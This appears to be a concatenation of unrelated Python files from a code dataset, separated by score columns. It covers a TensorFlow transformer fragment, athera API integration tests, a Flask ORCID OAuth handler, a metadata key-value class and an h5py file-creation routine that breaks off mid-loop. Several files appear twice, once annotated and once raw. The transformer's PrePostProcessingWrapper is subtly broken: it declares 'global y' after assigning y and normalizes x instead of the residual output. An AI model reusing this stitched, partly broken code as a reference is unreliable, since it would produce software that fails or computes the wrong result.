encoder_inputs = self_attention_layer(encoder_inputs, attention_bias)
with tf.variable_scope("ffn"):
encoder_inputs = feed_forward_network(encoder_inputs, inputs_padding)
return self.output_normalization(encoder_inputs)
class PrePostProcessingWrapper(object):
"""Wrapper class that applies layer pre-processing and post-processing.
Applies the passed layer, a residual connection, dropout, then layer normalization.
"""
def __init__(self, layer, params, train):
self.layer = layer
self.postprocess_dropout = params.layer_postprocess_dropout
self.train = train
# Create normalization layer
self.layer_norm = transformer.LayerNormalization(params.hidden_size)
def __call__(self, x, *args, **kwargs):
# Get layer output
y = self.layer(x, *args, **kwargs)
# residual connection
y = y + x
# Postprocessing: apply dropout and residual connection
if self.train:
global y
y = tf.nn.dropout(y, 1 - self.postprocess_dropout)
# Preprocessing: apply layer normalization
y = self.layer_norm(x)
return y
class ConvolutionalFeedForwardNetwork(tf.layers.Layer):
"""Fully connected feedforward network."""
def __init__(self, hidden_size, filter_size, relu_dropout, train):
super(ConvolutionalFeedForwardNetwork, self).__init__()
self.hidden_size = hidden_size
self.filter_size = filter_size
self.relu_dropout = relu_dropout
self.train = train
self.filter_dense_layer = tf.layers.Dense(
filter_size, use_bias=True, activation=tf.nn.relu, name="filter_layer")
self.convolutional_layer = tf.layers.Conv1D(
filters=filter_size, kernel_size=5, use_bias=True, activation=tf.nn.relu, name='conv_layer')
self.output_dense_layer = tf.layers.Dense(
hidden_size, use_bias=True, name="output_layer")
def call(self, x, padding=None):
"""Return outputs of the feedforward network.
Args:
x: tensor with shape [batch_size, length, hidden_size]
padding: (optional) If set, the padding values are temporarily removed
from x. The padding values are placed back in the output tensor in the
same locations. shape [batch_size, length]
Returns:
Output of the feedforward network.
tensor with shape [batch_size, length, hidden_size]
"""
# Retrieve dynamically known shapes
batch_size = tf.shape(x)[0]
length = tf.shape(x)[1]
if padding is not None:
with tf.name_scope("remove_padding"):
# Flatten padding to [batch_size*length]
pad_mask = tf.reshape(padding, [-1])
nonpad_ids = tf.to_int32(tf.where(pad_mask < 1e-9))
# Reshape x to [batch_size*length, hidden_size] to remove padding
x = tf.reshape(x, [-1, self.hidden_size])
x = tf.gather_nd(x, indices=nonpad_ids)
# Reshape x from 2 dimensions to 3 dimensions.
x.set_shape([None, self.hidden_size])
x = tf.expand_dims(x, axis=0)
output = self.filter_dense_layer(x)
if self.train:
output = tf.nn.dropout(output, 1.0 - self.relu_dropout)
output = self.convolutional_layer(output)
output = self.output_dense_layer(output)
if padding is not None:
with tf.name_scope("re_add_padding"):
output = tf.squeeze(output, axis=0)
output = tf.scatter_nd(
indices=nonpad_ids,
updates=output,
shape=[batch_size * length, self.hidden_size]
)
output = tf.reshape(output, [batch_size, length, self.hidden_size])
return output | 0.949517 | 0.311401 |
from settings import *
from athera.api import groups
import unittest
import uuid
from requests import codes
import os
class GroupsTest(unittest.TestCase):
    """Integration tests for the athera groups API (orgs, group, children, users)."""

    @classmethod
    def setUpClass(cls):
        cls.token = os.getenv("ATHERA_API_TEST_TOKEN")
        if not cls.token:
            raise ValueError("ATHERA_API_TEST_TOKEN environment variable must be set")

    @staticmethod
    def _random_id():
        # A freshly generated UUID is effectively guaranteed not to exist.
        return str(uuid.uuid4())

    def test_get_orgs(self):
        """Positive: the authenticated user can list orgs."""
        resp = groups.get_orgs(
            environment.ATHERA_API_TEST_BASE_URL,
            self.token,
        )
        self.assertEqual(resp.status_code, codes.ok)
        org_list = resp.json()['groups']
        self.assertTrue(org_list)
        self.assertTrue(org_list[0])
        self.assertIn("id", org_list[0])

    def test_get_group(self):
        """Positive: fetch the configured group by id."""
        resp = groups.get_group(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
        )
        self.assertEqual(resp.status_code, codes.ok)
        self.assertIn("id", resp.json())

    def test_get_group_random_target(self):
        """Negative: a random target group id yields 404."""
        resp = groups.get_group(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            self._random_id(),
        )
        self.assertEqual(resp.status_code, codes.not_found)

    def test_get_group_wrong_target(self):
        """Negative: a real but inaccessible target group yields 404."""
        resp = groups.get_group(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            environment.ATHERA_API_TEST_OTHER_GROUP_ID,
        )
        self.assertEqual(resp.status_code, codes.not_found)

    def test_get_group_children(self):
        """Positive: list the configured group's children."""
        resp = groups.get_group_children(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
        )
        self.assertEqual(resp.status_code, codes.ok)
        children = resp.json()['groups']
        self.assertTrue(children[0])
        self.assertIn("id", children[0])

    def test_get_group_children_bad_target(self):
        """Negative: a random target group id yields 404."""
        resp = groups.get_group_children(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            self._random_id(),
        )
        self.assertEqual(resp.status_code, codes.not_found)

    def test_get_group_children_wrong_target(self):
        """Negative: a real but inaccessible target group yields 404."""
        resp = groups.get_group_children(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            environment.ATHERA_API_TEST_OTHER_GROUP_ID,
        )
        self.assertEqual(resp.status_code, codes.not_found)

    def test_get_group_users(self):
        """Positive: list users of the configured group."""
        resp = groups.get_group_users(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
        )
        self.assertEqual(resp.status_code, codes.ok)
        users = resp.json()['users']
        self.assertTrue(users)
        self.assertTrue(users[0])
        self.assertIn("id", users[0])

    def test_get_group_users_bad_group(self):
        """Negative: a random group id yields 403."""
        resp = groups.get_group_users(
            environment.ATHERA_API_TEST_BASE_URL,
            self._random_id(),
            self.token,
        )
        self.assertEqual(resp.status_code, codes.forbidden)

    def test_get_group_users_wrong_group(self):
        """Negative: a real group this user cannot access yields 403."""
        resp = groups.get_group_users(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_OTHER_GROUP_ID,
            self.token,
        )
        self.assertEqual(resp.status_code, codes.forbidden)

    def test_get_group_users_bad_target(self):
        """Negative: a random target group id yields 404."""
        resp = groups.get_group_users(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            self._random_id(),
        )
        self.assertEqual(resp.status_code, codes.not_found)

    def test_get_group_users_wrong_target(self):
        """Negative: a real but inaccessible target group yields 404."""
        resp = groups.get_group_users(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            environment.ATHERA_API_TEST_OTHER_GROUP_ID,
        )
        self.assertEqual(resp.status_code, codes.not_found)
from athera.api import groups
import unittest
import uuid
from requests import codes
import os
class GroupsTest(unittest.TestCase):
    """Integration tests for the ``athera.api.groups`` endpoints.

    These tests issue real HTTP requests against the server at
    ``environment.ATHERA_API_TEST_BASE_URL`` and therefore require a valid
    bearer token (``ATHERA_API_TEST_TOKEN``) plus the group ids configured
    in the ``environment`` module.  ``ATHERA_API_TEST_OTHER_GROUP_ID`` is
    presumably a real group the test user must NOT have access to -- the
    negative tests rely on that.
    """

    @classmethod
    def setUpClass(cls):
        # The token is mandatory for every request; fail fast if it is missing.
        cls.token = os.getenv("ATHERA_API_TEST_TOKEN")
        if not cls.token:
            raise ValueError("ATHERA_API_TEST_TOKEN environment variable must be set")

    def test_get_orgs(self):
        """ Positive test """
        response = groups.get_orgs(
            environment.ATHERA_API_TEST_BASE_URL,
            self.token,
        )
        self.assertEqual(response.status_code, codes.ok)
        data = response.json()
        # Response payload is expected to be {"groups": [...]} with non-empty dicts.
        group_data = data['groups']
        self.assertNotEqual(len(group_data), 0)
        first_org = group_data[0]
        self.assertNotEqual(len(first_org), 0)
        self.assertIn("id", first_org)

    def test_get_group(self):
        """ Positive test """
        response = groups.get_group(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
        )
        self.assertEqual(response.status_code, codes.ok)
        # Single-group endpoint returns the group object directly.
        group_data = response.json()
        self.assertIn("id", group_data)

    def test_get_group_random_target(self):
        """ Negative test - random target group """
        response = groups.get_group(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            str(uuid.uuid4())
        )
        self.assertEqual(response.status_code, codes.not_found)

    def test_get_group_wrong_target(self):
        """ Negative test - target group is real but should not be accessible"""
        response = groups.get_group(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            environment.ATHERA_API_TEST_OTHER_GROUP_ID,
        )
        self.assertEqual(response.status_code, codes.not_found)

    def test_get_group_children(self):
        """ Positive test """
        response = groups.get_group_children(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
        )
        self.assertEqual(response.status_code, codes.ok)
        data = response.json()
        group_data = data['groups']
        # NOTE(review): unlike test_get_orgs, the children list itself is not
        # checked for non-emptiness before indexing [0] -- an empty children
        # list would raise IndexError rather than fail an assertion.
        first_child = group_data[0]
        self.assertNotEqual(len(first_child), 0)
        self.assertIn("id", first_child)

    def test_get_group_children_bad_target(self):
        """ Negative test - random target group """
        response = groups.get_group_children(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            str(uuid.uuid4())
        )
        self.assertEqual(response.status_code, codes.not_found)

    def test_get_group_children_wrong_target(self):
        """ Negative test - target group is real but should not be accessible """
        response = groups.get_group_children(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            environment.ATHERA_API_TEST_OTHER_GROUP_ID,
        )
        self.assertEqual(response.status_code, codes.not_found)

    def test_get_group_users(self):
        """ Positive test """
        response = groups.get_group_users(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
        )
        self.assertEqual(response.status_code, codes.ok)
        data = response.json()
        group_users = data['users']
        self.assertNotEqual(len(group_users), 0)
        first_user = group_users[0]
        self.assertNotEqual(len(first_user), 0)
        self.assertIn("id", first_user)

    def test_get_group_users_bad_group(self):
        """ Negative test - random group """
        # A random (unknown) group id yields 403, not 404 -- the API hides
        # existence of groups the caller cannot access.
        response = groups.get_group_users(
            environment.ATHERA_API_TEST_BASE_URL,
            str(uuid.uuid4()),
            self.token,
        )
        self.assertEqual(response.status_code, codes.forbidden)

    def test_get_group_users_wrong_group(self):
        """ Negative test - group is real but should not be accessible by this user """
        response = groups.get_group_users(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_OTHER_GROUP_ID,
            self.token,
        )
        self.assertEqual(response.status_code, codes.forbidden)

    def test_get_group_users_bad_target(self):
        """ Negative test - random target group """
        response = groups.get_group_users(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            str(uuid.uuid4())
        )
        self.assertEqual(response.status_code, codes.not_found)

    def test_get_group_users_wrong_target(self):
        """ Negative test - target group is real but should not be accessible by this user """
        response = groups.get_group_users(
            environment.ATHERA_API_TEST_BASE_URL,
            environment.ATHERA_API_TEST_GROUP_ID,
            self.token,
            environment.ATHERA_API_TEST_OTHER_GROUP_ID,
        )
        self.assertEqual(response.status_code, codes.not_found)
from flask import flash, redirect, session, url_for, current_app, Markup
from flask_user import current_user
from flask_login import login_user
from app.oauth.orcid_flask_dance import make_orcid_blueprint
from flask_dance.consumer import oauth_authorized, oauth_error
from flask_dance.consumer.storage.sqla import SQLAlchemyStorage
from sqlalchemy.orm.exc import NoResultFound
from app.models import db, User, OAuth
from datetime import datetime
from pprint import pprint
# Blueprint for the ORCID OAuth dance; tokens are persisted in the OAuth
# table via flask-dance's SQLAlchemy storage, keyed to the logged-in user.
orcid_blueprint = make_orcid_blueprint(
    storage=SQLAlchemyStorage(OAuth, db.session, user=current_user)
)
@oauth_authorized.connect_via(orcid_blueprint)
def orcid_logged_in(orcid_blueprint, token):
    """
    Handles the oauth dance for ORCID logins

    Args:
        orcid_blueprint: The instantiated orcid blueprint
        token: the oauth token

    Result:
        Will do one of four things:
        1. If user is not logged in, but there is an oauth, will login
        2. If user is not logged in, will create a new user using information from orcid, and login
        3. If a user is logged in, and oauth is associated already, will pass through
        4. If a user is logged in, but no oauth associated, will associate the oauth
    """
    # Check if I have an API token
    if not token:
        flash("Failed to log in.", category="error")
        # False tells flask-dance not to store the (missing) token.
        return False
    # get the orcid id information
    # ORCID API calls require that the orcid id be in the request, so that needs
    # to be extracted from the token prior to making any requests
    orcid_user_id = token['orcid']
    response = orcid_blueprint.session.get("{}/record".format(orcid_user_id))
    if not response.ok:
        flash("Failed to get ORCID User Data", category="error")
        return False
    orcid_record = response.json()
    pprint(orcid_record)  # NOTE(review): debug output; consider logging instead
    # Find this OAuth token in the database, if it was seen before.
    query = OAuth.query.filter_by(
        provider=orcid_blueprint.name, provider_user_id=orcid_user_id)
    try:
        oauth = query.one()
    except NoResultFound:
        # First time this ORCID id is seen: build a row (not persisted yet).
        oauth = OAuth(
            provider=orcid_blueprint.name,
            provider_user_id=orcid_user_id,
            provider_user_login=orcid_user_id,
            token=token)
    if current_user.is_anonymous:
        print("Current user is anonymous")
        if oauth.user:
            # Case 1 (above)
            return current_app.user_manager._do_login_user(oauth.user, url_for("main.public"))
        else:
            # Case 2 (above)
            print("!!! No Oauth")
            orcid_person = orcid_record['person']
            # check if there is a user with this email address
            # Check to see if the ORCID user has an email exposed, otherwise, we cannot use it
            if len(orcid_person['emails']['email']) == 0:
                flash(Markup(
                    "Failed to create new user, must have at least one ORCID "
                    "email address accessible to restricted. Please login to your "
                    "ORCID account at http://orcid.org and update your permissions."
                    " Please see <a href='https://support.orcid.org/hc/en-us/articles/360006897614'>"
                    " Visibitility in ORCID</a> "
                    "for more information."))
                return redirect(url_for("user.login"))
                # NOTE(review): unreachable -- the redirect above already
                # returned; possibly `return False` was the intended result here.
                return False
            orcid_email = orcid_person['emails']['email'][0]['email']
            query = User.query.filter_by(email=orcid_email)
            try:
                # An account with this email already exists: link and log in.
                nrc_u = query.one()
                oauth.user = nrc_u
                db.session.add(oauth)
                db.session.commit()
                login_user(oauth.user)
            except NoResultFound:
                print("!!!! we need to make an account")
                # Case 3
                # NOTE(review): per the docstring this is still Case 2 (new
                # user creation); the numbering here looks off -- confirm.
                try:
                    user = User(email=orcid_person['emails']['email'][0]['email'],
                                full_name="{} {}".format(orcid_person['name']['given-names']['value'],
                                                         orcid_person['name']['family-name']['value']),
                                active=True,
                                email_confirmed_at=datetime.utcnow(),
                                )
                    user.add_role("member")
                    user.add_role("registered-orcid", add_to_roles=True)
                    oauth.user = user
                    db.session.add_all([user, oauth])
                    db.session.commit()
                    # Need to use private method to bypass in this case
                    flash("Please update your Profile affiliation and affiliation type")
                    return current_app.user_manager._do_login_user(user, url_for('profile.current_user_profile_page'))
                except Exception as e:
                    flash("There was an error creating a user from the ORCID credentials: {}".format(e))
                    return redirect(url_for("user.login"))
    else:
        print("!!! Authenticated User")
        if oauth.user:
            flash("Account already associated with another user, cannot be associated")
            return redirect(url_for('profile.current_user_profile_page'))
        else:
            # Case 4 (above)
            print("!!! SHOULD BE HERE")
            oauth.user = current_user
            db.session.add(oauth)
            db.session.commit()
            flash("Successfully linked ORCID account")
    # Returning False disables flask-dance's default token storage; the token
    # was persisted manually above where needed.
    return False
@oauth_authorized.connect
def redirect_to_next_url(orcid_blueprint, token):
    """
    Redirect handler: if `login_next_url` exists in the session, redirect
    there after a successful OAuth login (runs for every provider, since it
    is connected without `connect_via`).
    """
    # retrieve `next_url` from Flask's session cookie
    if session.get('login_next_url') is not None:
        next_url = session["login_next_url"]
        # NOTE(review): the key is never popped from the session, so this
        # redirect will repeat on every later login -- confirm intended.
        # redirect the user to `next_url`
        return redirect(next_url)
@oauth_error.connect_via(orcid_blueprint)
def orcid_error(orcid_blueprint, **kwargs):
    """
    Handles passing back oauth errors elegantly.

    Args:
        orcid_blueprint: Orcid Blueprint
        **kwargs: arbitrary error details forwarded by the oauth_error signal

    Result:
        Flashes error messages if they exist
    """
    # Assemble "key = value " fragments for every detail the signal provided.
    details = "".join("{} = {} ".format(key, str(val)) for key, val in kwargs.items())
    msg = "OAuth error from {name}! ".format(name=orcid_blueprint.name) + details
    print("msg= {}".format(msg))
    flash(msg, category="error")
from flask_user import current_user
from flask_login import login_user
from app.oauth.orcid_flask_dance import make_orcid_blueprint
from flask_dance.consumer import oauth_authorized, oauth_error
from flask_dance.consumer.storage.sqla import SQLAlchemyStorage
from sqlalchemy.orm.exc import NoResultFound
from app.models import db, User, OAuth
from datetime import datetime
from pprint import pprint
orcid_blueprint = make_orcid_blueprint(
storage=SQLAlchemyStorage(OAuth, db.session, user=current_user)
)
@oauth_authorized.connect_via(orcid_blueprint)
def orcid_logged_in(orcid_blueprint, token):
"""
Handles the oauth dance for ORCID logins
Args:
orchid_blueprint: The instantiated orcid blueprint
token: the ouath token
Result:
Will do one of four things:
1. If user is not logged in, but there is an oauth, will login
2. If user is not logged in, will create a new user using information from orchid, and login
3. If a user is logged in, and oauth is associated already, will pass through
4. If a user is logged in, but no oauth associated, will associate the oauth
"""
# Check if I have an API token
if not token:
flash("Failed to log in.", category="error")
return False
# get the orcid id information
# ORCID API calls require that the orcid id be in the request, so that needs
# to be extracted from the token prior to making any requests
orcid_user_id = token['orcid']
response = orcid_blueprint.session.get("{}/record".format(orcid_user_id))
if not response.ok:
flash("Failed to get ORCID User Data", category="error")
return False
orcid_record = response.json()
pprint(orcid_record)
# Find this OAuth in the
query = OAuth.query.filter_by(
provider=orcid_blueprint.name, provider_user_id=orcid_user_id)
try:
oauth = query.one()
except NoResultFound:
oauth = OAuth(
provider=orcid_blueprint.name,
provider_user_id=orcid_user_id,
provider_user_login=orcid_user_id,
token=token)
if current_user.is_anonymous:
print("Current user is anonymous")
if oauth.user:
# Case 1 (above)
return current_app.user_manager._do_login_user(oauth.user, url_for("main.public"))
else:
# Case 2 (above)
print("!!! No Oauth")
orcid_person = orcid_record['person']
# check if there is a user with this email address
# Check to see if the ORCID user has an email exposed, otherwise, we cannot use it
if len(orcid_person['emails']['email']) == 0:
flash(Markup(
"Failed to create new user, must have at least one ORCID "
"email address accessible to restricted. Please login to your "
"ORCID account at http://orcid.org and update your permissions."
" Please see <a href='https://support.orcid.org/hc/en-us/articles/360006897614'>"
" Visibitility in ORCID</a> "
"for more information."))
return redirect(url_for("user.login"))
return False
orcid_email = orcid_person['emails']['email'][0]['email']
query = User.query.filter_by(email=orcid_email)
try:
nrc_u = query.one()
oauth.user = nrc_u
db.session.add(oauth)
db.session.commit()
login_user(oauth.user)
except NoResultFound:
print("!!!! we need to make an account")
# Case 3
try:
user = User(email=orcid_person['emails']['email'][0]['email'],
full_name="{} {}".format(orcid_person['name']['given-names']['value'],
orcid_person['name']['family-name']['value']),
active=True,
email_confirmed_at=datetime.utcnow(),
)
user.add_role("member")
user.add_role("registered-orcid", add_to_roles=True)
oauth.user = user
db.session.add_all([user, oauth])
db.session.commit()
# Need to use private method to bypass in this case
flash("Please update your Profile affiliation and affiliation type")
return current_app.user_manager._do_login_user(user, url_for('profile.current_user_profile_page'))
except Exception as e:
flash("There was an error creating a user from the ORCID credentials: {}".format(e))
return redirect(url_for("user.login"))
else:
print("!!! Authenticated User")
if oauth.user:
flash("Account already associated with another user, cannot be associated")
return redirect(url_for('profile.current_user_profile_page'))
else:
# Case 4 (above)
print("!!! SHOULD BE HERE")
oauth.user = current_user
db.session.add(oauth)
db.session.commit()
flash("Successfully linked ORCID account")
return False
@oauth_authorized.connect
def redirect_to_next_url(orcid_blueprint, token):
"""
redirect function to handle properly redirec if
login_next_url exists in the session
"""
# retrieve `next_url` from Flask's session cookie
if session.get('login_next_url') is not None:
next_url = session["login_next_url"]
# redirect the user to `next_url`
return redirect(next_url)
@oauth_error.connect_via(orcid_blueprint)
def orcid_error(orcid_blueprint, **kwargs):
"""
Handles passing back ouath errors elegantly
Args:
orchid_blueprint: Orcid Blueprint
Result:
Flashes error messages if they exist
"""
msg = "OAuth error from {name}! ".format(name=orcid_blueprint.name)
for k, v in kwargs.items():
msg += "{} = {} ".format(k, str(v))
print("msg= {}".format(msg))
flash(msg, category="error") | 0.399343 | 0.095349 |
import os
from squirrel.shared.squirrelerror import SquirrelError
from bvzlocalization import LocalizedResource
class KeyValuePairs(object):
    """
    A class to manage a specific metadata (key=value pairs) file within an asset.

    Keys are normalized to upper case when written. The backing file lives at
    ``<asset>/.metadata/keyvalues`` and stores one ``KEY=value`` pair per line.
    """

    # ------------------------------------------------------------------------------------------------------------------
    def __init__(self,
                 resources_obj,
                 asset_d):
        """
        Set up instance to hold the path to the keywords file.

        :param resources_obj: The localized resource object used to build error messages.
        :param asset_d: The path to the asset directory.
        """
        assert type(resources_obj) is LocalizedResource
        assert type(asset_d) is str

        self.localized_resource_obj = resources_obj
        self.asset_d = asset_d
        self.keyvalues_p = os.path.join(asset_d, ".metadata", "keyvalues")

    # ------------------------------------------------------------------------------------------------------------------
    def _verify_asset_dir_exists(self):
        """
        Checks to make sure the asset directory exists.

        :raises SquirrelError: If the asset directory is missing (error 11208).

        :return:
            Nothing.
        """
        if not os.path.exists(self.asset_d):
            err_msg = self.localized_resource_obj.get_error_msg(11208)
            raise SquirrelError(err_msg, 11208)

    # ------------------------------------------------------------------------------------------------------------------
    def _verify_key_value_file_exists(self):
        """
        Checks to make sure the key value file exists.

        :raises SquirrelError: If the keyvalues file is missing (error 11109).

        :return:
            Nothing.
        """
        if not os.path.exists(self.keyvalues_p):
            err_msg = self.localized_resource_obj.get_error_msg(11109)
            raise SquirrelError(err_msg, 11109)

    # ------------------------------------------------------------------------------------------------------------------
    def add_key_value_pairs(self,
                            key_value_pairs):
        """
        Adds key value pairs to the keyvalues metadata file. Existing keys
        (matched on their upper-cased name) are overwritten.

        :param key_value_pairs:
            The dict of key value pairs to add. Values are written verbatim and
            must therefore be strings.

        :return:
            Nothing.
        """
        assert type(key_value_pairs) is dict

        self._verify_asset_dir_exists()

        try:
            existing_keys = self.get_key_value_pairs()
        except SquirrelError:
            # No keyvalues file yet; start from an empty mapping.
            existing_keys = dict()

        for key, value in key_value_pairs.items():
            existing_keys[key.upper()] = value

        with open(self.keyvalues_p, "w") as f:
            for key, value in existing_keys.items():
                f.write(key + "=" + value + "\n")

    # ------------------------------------------------------------------------------------------------------------------
    def remove_key_value_pairs(self,
                               keys):
        """
        Removes key value pairs from the keyvalues metadata file. The
        comparison is case-insensitive, and the caller's list is not modified.

        :param keys:
            The list of keys to remove.

        :return:
            Nothing.
        """
        self._verify_asset_dir_exists()

        assert type(keys) is list

        # Normalize into a new set so the caller's list is left untouched (the
        # previous implementation upper-cased ``keys`` in place) and membership
        # tests are O(1).
        keys_to_remove = {key.upper() for key in keys}

        existing_key_value_pairs = self.get_key_value_pairs()

        with open(self.keyvalues_p, "w") as f:
            for existing_key, value in existing_key_value_pairs.items():
                if existing_key.strip().upper() not in keys_to_remove:
                    f.write(existing_key.strip().upper() + "=" + value + "\n")

    # ------------------------------------------------------------------------------------------------------------------
    def get_key_value_pairs(self):
        """
        Returns a dictionary of key value pairs from the keyvalues metadata file.
        Blank or malformed lines (no ``=``) are skipped; previously they raised
        an IndexError.

        :raises SquirrelError: If the keyvalues file does not exist.

        :return:
            A dictionary of key value pairs.
        """
        self._verify_key_value_file_exists()

        with open(self.keyvalues_p, "r") as f:
            lines = f.readlines()

        output = dict()
        for line in lines:
            key, sep, value = line.partition("=")
            if not sep:
                # Skip lines that carry no key=value pair at all.
                continue
            output[key] = value.rstrip()

        return output
from squirrel.shared.squirrelerror import SquirrelError
from bvzlocalization import LocalizedResource
class KeyValuePairs(object):
"""
A class to manage a specific metadata (key=value pairs) file within an asset.
"""
# ------------------------------------------------------------------------------------------------------------------
def __init__(self,
resources_obj,
asset_d):
"""
Set up instance to hold the path to the keywords file.
"""
assert type(resources_obj) is LocalizedResource
assert type(asset_d) is str
self.localized_resource_obj = resources_obj
self.asset_d = asset_d
self.keyvalues_p = os.path.join(asset_d, ".metadata", "keyvalues")
# ------------------------------------------------------------------------------------------------------------------
def _verify_asset_dir_exists(self):
"""
Checks to make sure the asset directory exists.
:return:
Nothing.
"""
if not os.path.exists(self.asset_d):
err_msg = self.localized_resource_obj.get_error_msg(11208)
raise SquirrelError(err_msg, 11208)
# ------------------------------------------------------------------------------------------------------------------
def _verify_key_value_file_exists(self):
"""
Checks to make sure the key value file exists.
:return:
Nothing.
"""
if not os.path.exists(self.keyvalues_p):
err_msg = self.localized_resource_obj.get_error_msg(11109)
raise SquirrelError(err_msg, 11109)
# ------------------------------------------------------------------------------------------------------------------
def add_key_value_pairs(self,
key_value_pairs):
"""
Adds key value pairs to the keyvalues metadata file.
:param key_value_pairs:
The dict of key value pairs to add.
:return:
Nothing.
"""
assert type(key_value_pairs) is dict
self._verify_asset_dir_exists()
try:
existing_keys = self.get_key_value_pairs()
except SquirrelError:
existing_keys = dict()
for key, value in key_value_pairs.items():
existing_keys[key.upper()] = value
with open(self.keyvalues_p, "w") as f:
for key, value in existing_keys.items():
f.write(key + "=" + value + "\n")
# ------------------------------------------------------------------------------------------------------------------
def remove_key_value_pairs(self,
keys):
"""
Removes key value pairs from the keyvalues metadata file.
:param keys:
The list of keys to remove.
:return:
Nothing.
"""
self._verify_asset_dir_exists()
assert type(keys) is list
for i in range(len(keys)):
keys[i] = keys[i].upper()
existing_key_value_pairs = self.get_key_value_pairs()
with open(self.keyvalues_p, "w") as f:
for existing_key, value in existing_key_value_pairs.items():
if existing_key.strip().upper() not in keys:
f.write(existing_key.strip().upper() + "=" + value + "\n")
# ------------------------------------------------------------------------------------------------------------------
def get_key_value_pairs(self):
"""
Returns a dictionary of key value pairs from the keyvalues metadata file.
:return:
A dictionary of key value pairs.
"""
self._verify_key_value_file_exists()
with open(self.keyvalues_p, "r") as f:
lines = f.readlines()
output = dict()
for line in lines:
output[line.split("=", 1)[0]] = line.split("=", 1)[1].rstrip()
return output | 0.63023 | 0.269314 |
import h5py
import numpy as np
from multiprocess import cpu_count, Pool
from concurrent.futures import ThreadPoolExecutor
import os
from functools import partial
from tqdm import tqdm
from .features import Feature
from .crud import _add, _load, H5_NONE, SRC_KEY, apply_and_store
from .utils import flatten_dict
__all__ = [
"_create",
'_compute',
]
class SerialExecutor:
    """Drop-in stand-in for a worker pool that evaluates everything inline.

    Mirrors the subset of the Pool / ThreadPoolExecutor interface used by
    this module (``map``, context-manager protocol, ``close``, ``join``).
    """

    def map(self, func, iterable):
        # Lazy, single-process evaluation; same call shape as Pool.map.
        return map(func, iterable)

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        return None

    def close(self):
        # Nothing to shut down.
        return None

    def join(self):
        # Nothing to wait for.
        return None
def get_executor(n_workers=cpu_count(), parallelism='mp'):
    """Return the executor matching the requested flavour of parallelism.

    'mp' -> a process pool, 'threads' -> a thread pool, 'none' -> an inline
    SerialExecutor. Raises ValueError for anything else.
    """
    if parallelism == 'mp':
        return Pool(n_workers)
    if parallelism == 'threads':
        return ThreadPoolExecutor(n_workers)
    if parallelism == 'none':
        return SerialExecutor()
    raise ValueError(f"parallelism must be one of ['mp', 'threads', 'none']. Got '{parallelism}'")
def _create(cls,
            filename,
            sources,
            mode="w",
            schema={},
            n_workers=cpu_count(),
            parallelism='mp',
            keep_open=False,
            **h5_kwargs
            ):
    """Build an h5 file at ``filename`` by loading every source through the schema.

    Creates one h5 group per schema key, loads ``sources`` in batches of
    ``n_workers`` through the chosen executor, writes the results, runs each
    feature's ``after_create`` hook, and finally returns an instance of ``cls``
    opened on the new file.

    NOTE(review): ``schema={}`` is a mutable default, but it is only ever
    rebound (never mutated), so it is harmless here.
    """
    if not schema:
        # get schema from the class attributes
        schema = {attr: val for attr, val in cls.__dict__.items() if isinstance(val, Feature)}
    if not schema:
        raise ValueError("schema cannot be empty. Either provide one to create()"
                         " or attach Feature attributes to this class.")
    # avoid blocking errors from h5py
    if os.path.exists(filename) and mode == 'w':
        os.remove(filename)
    f = h5py.File(filename, mode, **h5_kwargs)
    f.require_group(SRC_KEY)
    # create groups from schema and write attrs
    groups = {key: f.create_group(key) if key not in f else f[key] for key in schema.keys()}
    for key, grp in groups.items():
        for k, v in schema[key].attrs.items():
            # h5 attrs cannot store None; H5_NONE is the module's sentinel.
            grp.attrs[k] = v if v is not None else H5_NONE
    f.flush()
    # initialize ds_kwargs from schema
    ds_kwargs = {key: getattr(feature, "__ds_kwargs__", {}).copy() for key, feature in schema.items()}
    # get flavour of parallelism
    try:
        executor = get_executor(n_workers, parallelism)
    except ValueError as e:
        # Close the file before re-raising so it is not left locked.
        f.close()
        raise e
    # run loading routine
    n_sources = len(sources)
    batch_size = n_workers * 1
    refed_paths = set()
    for i in tqdm(range(1 + n_sources // batch_size), leave=False):
        start_loc = max([i * batch_size, 0])
        end_loc = min([(i + 1) * batch_size, n_sources])
        this_sources = sources[start_loc:end_loc]
        try:
            results = executor.map(partial(_load, schema=schema, guard_func=Feature.load), this_sources)
        except Exception as e:
            # Roll back: close the handle, delete a half-written new file, and
            # kill worker processes before propagating.
            f.close()
            if mode == "w":
                os.remove(filename)
            if parallelism == 'mp':
                executor.terminate()
            raise e
            # NOTE(review): ThreadPoolExecutor.map and the serial map are lazy,
            # so their worker exceptions surface in the loop below rather than
            # in this try block -- confirm that is acceptable.
        # write results
        for n, res in enumerate(results):
            if not res:
                continue
